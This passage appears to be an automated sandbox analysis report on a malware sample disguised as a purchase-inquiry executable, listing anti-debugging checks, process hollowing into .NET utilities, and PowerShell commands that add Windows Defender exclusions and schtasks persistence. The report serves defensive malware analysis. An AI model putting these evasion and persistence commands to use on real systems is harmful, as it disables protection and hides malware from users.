                    Source: InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: Amcache.hve.18.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_010A7EE0 CheckRemoteDebuggerPresent,15_2_010A7EE0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Allocates memory in foreign processes
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5A
                    Sample uses process hollowing technique
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base address: 400000
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8DE008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 442000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 95A008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 442000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A45008
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 442000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: B94008
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeQueries volume information: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
